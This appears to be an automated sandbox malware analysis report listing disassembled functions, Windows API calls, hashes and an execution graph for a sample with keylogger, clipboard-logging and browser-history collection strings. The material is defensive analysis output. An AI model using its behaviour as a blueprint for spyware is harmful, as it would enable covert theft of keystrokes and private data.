                                                                                                                                                                                    • Opcode Fuzzy Hash: c2f2778b18ed07a02e49b089b2e1d5221d5351f24d21b4a071a971637e080ae0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85117A33744791AEEA229E6C8CD495E3F7BBF81650F840C09E28346581FF957884CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBC485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 15CBC49E
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,15CA412F,15D05E74), ref: 15CBC4B2
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 15CBC4D7
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC4E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3919263394-0
                                                                                                                                                                                    • Opcode ID: 61b395a4b7c9c088915f514727393a4051b61ea3ae7d7b067da6ca09fde507ba
                                                                                                                                                                                    • Instruction ID: fa4d0112e66af5f8a8bc221d02280a1f8ed6887079590038423d34c326d02582
                                                                                                                                                                                    • Opcode Fuzzy Hash: 61b395a4b7c9c088915f514727393a4051b61ea3ae7d7b067da6ca09fde507ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F0C2B620122A7FE6145E65DCD4FBF365CEB86AA4F00092AF901E21C0DF615D058572
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 15CA4066
                                                                                                                                                                                      • Part of subcall function 15CBB978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,15CA407C), ref: 15CBB99F
                                                                                                                                                                                      • Part of subcall function 15CB8568: CloseHandle.KERNEL32(15CA40F5), ref: 15CB857E
                                                                                                                                                                                      • Part of subcall function 15CB8568: CloseHandle.KERNEL32(15D05E74), ref: 15CB8587
                                                                                                                                                                                      • Part of subcall function 15CBC485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 15CBC49E
                                                                                                                                                                                    • Sleep.KERNEL32(000000FA,15D05E74), ref: 15CA4138
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • /sort "Visit Time" /stext ", xrefs: 15CA40B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                    • String ID: /sort "Visit Time" /stext "
                                                                                                                                                                                    • API String ID: 368326130-1573945896
                                                                                                                                                                                    • Opcode ID: 445104110a4cb497eedd64782ee445765c902e0cdf62bdc91798a9962211df0d
                                                                                                                                                                                    • Instruction ID: d16052e00f23ea1db393aa0babb95c7bc374f9b6a9805da368ec7b096b08a6f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 445104110a4cb497eedd64782ee445765c902e0cdf62bdc91798a9962211df0d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E431323BB1015A5BCB14EFB4DC959EEBB7AAF90240F400969E506A7190FF207E49CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAB748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CD4770: __onexit.LIBCMT ref: 15CD4776
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15CAB797
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                                                                                                    • Opcode ID: 47ec4f1adfcc4fb004a6f9d43947d0550d568aa5b58711bfe46aa0657d7c17f3
                                                                                                                                                                                    • Instruction ID: a5ddf35e9b467127057f8e6b0805fa95552a0f1a888547e5a6a673f787d02c41
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47ec4f1adfcc4fb004a6f9d43947d0550d568aa5b58711bfe46aa0657d7c17f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7321523BA101668ACB14EFA4DCD1DEDBB75AF90254F500D29D50697180FF707D4ACB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03231C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0936cd44e113f63177a0ec4b258fc5decbcd1320f762c1d7ff510f1f7e5bedee
                                                                                                                                                                                    • Instruction ID: 3d84491de56919c4fd29403502db676fe07c3d8232a43e37b458c58d4777e246
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0936cd44e113f63177a0ec4b258fc5decbcd1320f762c1d7ff510f1f7e5bedee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14A1D6E77307150BD718FA7C9C843BDB3D59B86221F1C827ED115CB385DB64E9A28290
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 032394A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,03239596), ref: 0323952E
                                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 03239534
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                                                                                    • String ID: yyyy
                                                                                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                                                                                    • Opcode ID: 024b2543dc4e9ab6c7765e09f4d6bf2e92f1c1ba0ff83f58e862e3c38451a679
                                                                                                                                                                                    • Instruction ID: 70927b6ef061d4c32aa1d02e0b0a1e550398d7c2c5783b1608d10194bb071243
                                                                                                                                                                                    • Opcode Fuzzy Hash: 024b2543dc4e9ab6c7765e09f4d6bf2e92f1c1ba0ff83f58e862e3c38451a679
                                                                                                                                                                                    • Instruction Fuzzy Hash: 172162B5A252189FDB11EF65C841BEEB3B8EF4A710F5100A5E905EB240D7B4DEC0CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAB051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CAB164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                      • Part of subcall function 15CAB164: wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CAB0B4
                                                                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 15CAB0C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                                                                                    • Opcode ID: a3c90d8dee2c5cb3c384ee4350fbf737f624553eadbfca9670ce048952e160b2
                                                                                                                                                                                    • Instruction ID: c0bb586923c02f68d92757cb6946a9b2e6bb9f517ac4337585ced6f60e9c7111
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c90d8dee2c5cb3c384ee4350fbf737f624553eadbfca9670ce048952e160b2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C01B13BB042665BDB21AF74C81A7BE7FB5AB81104F800C5DD542026C1FFA63459DBD2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE0C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,15CA1D55), ref: 15CE0D27
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CE0D35
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 15CE0D90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                    • Opcode ID: 7ba3155ec167544ff9a3e982c3d4e05681cfc68b79e59779608f0997aff32a35
                                                                                                                                                                                    • Instruction ID: d1e020c1028d5ac728b3cf3db3f3312c6abd287131ebfa857a1ea72aa7dbdbae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba3155ec167544ff9a3e982c3d4e05681cfc68b79e59779608f0997aff32a35
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC41F93AA04256AFCF11CF65C844BAA7FB9FF01710F118969F855BB190DB74AA41C7D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CB1B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,15CB1EF0), ref: 15CB1B8C
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014,15CB1EF0), ref: 15CB1C58
                                                                                                                                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CB1C7A
                                                                                                                                                                                    • SetLastError.KERNEL32(0000007E,15CB1EF0), ref: 15CB1C91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4100373531-0
                                                                                                                                                                                    • Opcode ID: c9917f297d98e89dacff4c6a20fe6462e93b2288f8a8b1bade270ea04a8111e6
                                                                                                                                                                                    • Instruction ID: 1ce2a5342009f4762a87e70664afe691a651887253b7431a32c36bcd512423d8
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9917f297d98e89dacff4c6a20fe6462e93b2288f8a8b1bade270ea04a8111e6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C419876608305DFEB14CF59D984B66B3E9FF88754F00082EE98A87651EBB1E904CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03249F9C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 03249FD0
                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0324A000
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 0324A01F
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0324A02B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Read$Write
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3448952669-0
                                                                                                                                                                                    • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                                    • Instruction ID: 55cae84415b8bded12bff2013675ca099869579e920cb3f02493c2d215ff93fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6821B7B569131AABDB14CF28CC80B9E73ACFF84351F048555EE109B341E779D8918A94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:7.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:1471
                                                                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                                                                    execution_graph 32877 2de920db 32879 2de920e7 ___DestructExceptionObject 32877->32879 32878 2de92110 dllmain_raw 32880 2de9212a 32878->32880 32889 2de920f6 32878->32889 32879->32878 32883 2de9210b 32879->32883 32879->32889 32890 2de91eec 32880->32890 32882 2de92177 32884 2de91eec 31 API calls 32882->32884 32882->32889 32883->32882 32886 2de91eec 31 API calls 32883->32886 32883->32889 32885 2de9218a 32884->32885 32887 2de92193 dllmain_raw 32885->32887 32885->32889 32888 2de9216d dllmain_raw 32886->32888 32887->32889 32888->32882 32891 2de91f2a dllmain_crt_process_detach 32890->32891 32892 2de91ef7 32890->32892 32898 2de91f06 32891->32898 32893 2de91f1c dllmain_crt_process_attach 32892->32893 32894 2de91efc 32892->32894 32893->32898 32895 2de91f01 32894->32895 32896 2de91f12 32894->32896 32895->32898 32900 2de9240b 27 API calls 32895->32900 32901 2de923ec 29 API calls 32896->32901 32898->32883 32900->32898 32901->32898 32902 2de91c5b 32903 2de91c6b ___scrt_fastfail 32902->32903 32906 2de912ee 32903->32906 32905 2de91c87 32907 2de91324 ___scrt_fastfail 32906->32907 32908 2de913b7 GetEnvironmentVariableW 32907->32908 32932 2de910f1 32908->32932 32911 2de910f1 57 API calls 32912 2de91465 32911->32912 32913 2de910f1 57 API calls 32912->32913 32914 2de91479 32913->32914 32915 2de910f1 57 API calls 32914->32915 32916 2de9148d 32915->32916 32917 2de910f1 57 API calls 32916->32917 32918 2de914a1 32917->32918 32919 2de910f1 57 API calls 32918->32919 32920 2de914b5 lstrlenW 32919->32920 32921 2de914d9 lstrlenW 32920->32921 32922 2de914d2 32920->32922 32923 2de910f1 57 API calls 32921->32923 32922->32905 32924 2de91501 lstrlenW lstrcatW 32923->32924 32925 2de910f1 57 API calls 32924->32925 32926 2de91539 lstrlenW lstrcatW 32925->32926 32927 2de910f1 57 API calls 32926->32927 32928 2de9156b lstrlenW lstrcatW 32927->32928 32929 2de910f1 57 API calls 32928->32929 32930 2de9159d lstrlenW lstrcatW 32929->32930 32931 2de910f1 57 API calls 32930->32931 32931->32922 32933 2de91118 ___scrt_fastfail 32932->32933 32934 2de91129 lstrlenW 32933->32934 32945 2de92c40 32934->32945 32937 2de91168 lstrlenW 32938 2de91177 lstrlenW FindFirstFileW 32937->32938 32939 2de911e1 32938->32939 32940 2de911a0 32938->32940 32939->32911 32941 2de911aa 32940->32941 32942 2de911c7 FindNextFileW 32940->32942 32941->32942 32947 2de91000 57 API calls ___scrt_fastfail 32941->32947 32942->32940 32944 2de911da FindClose 32942->32944 32944->32939 32946 2de91148 lstrcatW lstrlenW 32945->32946 32946->32937 32946->32938 32947->32941 32948 3359b30 32951 334d5d0 32948->32951 32950 3359b38 32952 334d5d8 32951->32952 32953 334d603 32952->32953 32954 334d62d 32953->32954 32955 334d67e 32954->32955 33987 3347be8 32955->33987 32957 334d691 32958 334d6af 32957->32958 32959 334d6ec 32958->32959 32960 3347be8 VirtualProtect 32959->32960 32961 334d6f5 32960->32961 32962 334d713 32961->32962 32963 334d73e 32962->32963 32964 334d750 32963->32964 32965 3347be8 VirtualProtect 32964->32965 32966 334d759 32965->32966 32967 334d777 32966->32967 32968 334d77f 32967->32968 32969 334d7a2 32968->32969 32970 334d7b4 32969->32970 32971 3347be8 VirtualProtect 32970->32971 32972 334d7bd 32971->32972 32973 334d7e3 32972->32973 32974 334d806 32973->32974 32975 334d818 32974->32975 32976 3347be8 VirtualProtect 32975->32976 32977 334d821 32976->32977 32978 334d83f 32977->32978 32979 3347be8 VirtualProtect 32978->32979 32980 334d848 32979->32980 32981 334d855 32980->32981 32982 3347be8 VirtualProtect 32981->32982 32983 334d86f 32982->32983 32984 3347be8 VirtualProtect 32983->32984 32985 334d896 32984->32985 32986 334d8bc 32985->32986 32987 334d8df 32986->32987 32988 334d8f1 32987->32988 32989 3347be8 VirtualProtect 32988->32989 32990 334d8fa 32989->32990 32991 334d918 32990->32991 32992 3347be8 VirtualProtect 32991->32992 32993 334d921 32992->32993 32994 3347be8 VirtualProtect 32993->32994 32995 334d954 32994->32995 32996 334d97b 32995->32996 32997 3347be8 VirtualProtect 32996->32997 32998 334d987 32997->32998 32999 334d9a8 32998->32999 33000 3347be8 VirtualProtect 32999->33000 33001 334da03 33000->33001 33002 334da24 33001->33002 33003 3347be8 VirtualProtect 33002->33003 33004 334da7f 33003->33004 33005 334daa6 33004->33005 33006 3347be8 VirtualProtect 33005->33006 33007 334dab2 33006->33007 33008 3347be8 VirtualProtect 33007->33008 33009 334dae5 33008->33009 33010 334daf5 33009->33010 33011 3347be8 VirtualProtect 33010->33011 33012 334db18 33011->33012 33013 334db7b 33012->33013 33014 3347be8 VirtualProtect 33013->33014 33015 334db94 33014->33015 33016 334dbbb 33015->33016 33017 3347be8 VirtualProtect 33016->33017 33018 334dbc7 33017->33018 33019 3347be8 VirtualProtect 33018->33019 33020 334dbfa 33019->33020 33021 334dc21 33020->33021 33022 3347be8 VirtualProtect 33021->33022 33023 334dc2d 33022->33023 33024 334dc9d 33023->33024 33025 3347be8 VirtualProtect 33024->33025 33026 334dca9 33025->33026 33027 334dd19 33026->33027 33028 3347be8 VirtualProtect 33027->33028 33029 334dd25 33028->33029 33030 3347be8 VirtualProtect 33029->33030 33031 334dd58 33030->33031 33032 3347be8 VirtualProtect 33031->33032 33033 334dd8b 33032->33033 33034 3347be8 VirtualProtect 33033->33034 33035 334ddbe 33034->33035 33036 334de16 33035->33036 33037 3347be8 VirtualProtect 33036->33037 33038 334de3a 33037->33038 33039 334de92 33038->33039 33040 3347be8 VirtualProtect 33039->33040 33041 334deb6 33040->33041 33042 334df26 33041->33042 33043 3347be8 VirtualProtect 33042->33043 33044 334df32 33043->33044 33045 334df6b 33044->33045 33046 334dfa2 33045->33046 33047 3347be8 VirtualProtect 33046->33047 33048 334dfae 33047->33048 33049 334dfd5 33048->33049 33050 334e00e 33049->33050 33051 3347be8 VirtualProtect 33050->33051 33052 334e051 33051->33052 33053 334e08a 33052->33053 33054 3347be8 VirtualProtect 33053->33054 33055 334e0cd 33054->33055 33056 334e0f6 33055->33056 33058 334e203 33055->33058 33057 334e117 33056->33057 33060 3347be8 VirtualProtect 33057->33060 33059 3347be8 VirtualProtect 33058->33059 33061 334e27f 33059->33061 33062 334e172 33060->33062 33063 334e2a0 33061->33063 33064 334e193 33062->33064 33066 334e2ab 33063->33066 33065 334e19e 33064->33065 33068 3347be8 VirtualProtect 33065->33068 33067 3347be8 VirtualProtect 33066->33067 33069 334e1ee 33067->33069 33068->33069 33070 334e1fe 33069->33070 33071 334e32b 33070->33071 33072 3347be8 VirtualProtect 33071->33072 33073 334e386 33072->33073 33074 334e3a7 33073->33074 33075 3347be8 VirtualProtect 33074->33075 33076 334e402 33075->33076 33077 334e40f 33076->33077 33078 334e439 33077->33078 33079 334e452 33078->33079 33080 334e4c2 33079->33080 33081 3347be8 VirtualProtect 33080->33081 33082 334e4ce 33081->33082 33083 334e53e 33082->33083 33084 3347be8 VirtualProtect 33083->33084 33085 334e54a 33084->33085 33086 334e5ba 33085->33086 33087 3347be8 VirtualProtect 33086->33087 33088 334e5c6 33087->33088 33089 334e5ff 33088->33089 33090 334e636 33089->33090 33091 3347be8 VirtualProtect 33090->33091 33092 334e642 33091->33092 33093 334e672 33092->33093 33094 334e67d 33093->33094 33095 334e6b4 33094->33095 33096 334e6c1 33095->33096 33097 3347be8 VirtualProtect 33096->33097 33098 334e6cd 33097->33098 33099 334e6ee 33098->33099 33100 334e6f9 33099->33100 33101 334e730 33100->33101 33102 334e73d 33101->33102 33103 3347be8 VirtualProtect 33102->33103 33104 334e749 33103->33104 33105 334e76a 33104->33105 33106 334e775 33105->33106 33107 334e782 33106->33107 33108 334e7ac 33107->33108 33109 3347be8 VirtualProtect 33108->33109 33110 334e7c5 33109->33110 33111 334e7cf 33110->33111 33112 334e7e7 33111->33112 33113 334e7ef 33112->33113 33114 334efab 33112->33114 33115 334e810 33113->33115 33116 334efd7 33114->33116 33117 334e828 33115->33117 33118 334f003 33116->33118 33120 334e852 33117->33120 33119 334f00e 33118->33119 33121 3347be8 VirtualProtect 33119->33121 33122 3347be8 VirtualProtect 33120->33122 33124 334f027 33121->33124 33123 334e86b 33122->33123 33126 334e88c 33123->33126 33125 334f053 33124->33125 33128 334f07f 33125->33128 33127 334e8a4 33126->33127 33130 334e8ce 33127->33130 33129 334f08a 33128->33129 33131 3347be8 VirtualProtect 33129->33131 33132 3347be8 VirtualProtect 33130->33132 33133 334f0a3 33131->33133 33134 334e8e7 33132->33134 33135 334f0c4 33133->33135 33136 334e908 33134->33136 33137 334f0dc 33135->33137 33138 334e920 33136->33138 33139 334f0fb 33137->33139 33140 334e94a 33138->33140 33141 334f113 33139->33141 33142 334e957 33140->33142 33143 3347be8 VirtualProtect 33141->33143 33144 3347be8 VirtualProtect 33142->33144 33145 334f11f 33143->33145 33146 334e963 33144->33146 33147 334f130 33145->33147 33148 334e974 33146->33148 33150 334f141 33147->33150 33149 334e995 33148->33149 33151 334e9b6 33149->33151 33152 334f172 33150->33152 33153 334e9c1 33151->33153 33154 334f18a 33152->33154 33157 334e9ce 33153->33157 33155 334f1b4 33154->33155 33156 334f1c1 33155->33156 33158 3347be8 VirtualProtect 33156->33158 33159 3347be8 VirtualProtect 33157->33159 33160 334f1cd 33158->33160 33162 334ea11 33159->33162 33161 334f1ee 33160->33161 33163 334f206 33161->33163 33164 334ea3d 33162->33164 33165 334f23d 33163->33165 33166 334ea81 33164->33166 33167 3347be8 VirtualProtect 33165->33167 33168 3347be8 VirtualProtect 33166->33168 33169 334f249 33167->33169 33170 334ea8d 33168->33170 33172 334f26a 33169->33172 33171 334eab9 33170->33171 33174 334eac6 33171->33174 33173 334f282 33172->33173 33175 334f2a1 33173->33175 33176 334eaf0 33174->33176 33178 334f2b9 33175->33178 33177 334eafd 33176->33177 33180 3347be8 VirtualProtect 33177->33180 33179 3347be8 VirtualProtect 33178->33179 33181 334f2c5 33179->33181 33182 334eb09 33180->33182 33183 334f2da 33181->33183 33185 334eb31 33182->33185 33184 334f2ed 33183->33184 33186 334f30e 33184->33186 33187 334eb52 33185->33187 33189 334f319 33186->33189 33188 334eb6a 33187->33188 33190 334eb89 33188->33190 33191 334f35d 33189->33191 33193 3347be8 VirtualProtect 33190->33193 33192 3347be8 VirtualProtect 33191->33192 33194 334f369 33192->33194 33195 334ebad 33193->33195 33197 334f38a 33194->33197 33196 334ebce 33195->33196 33199 334ebe6 33196->33199 33198 334f3cc 33197->33198 33200 334f3d9 33198->33200 33202 3347be8 VirtualProtect 33199->33202 33201 3347be8 VirtualProtect 33200->33201 33203 334f3e5 33201->33203 33204 334ec29 33202->33204 33205 334f406 33203->33205 33206 334ec38 33204->33206 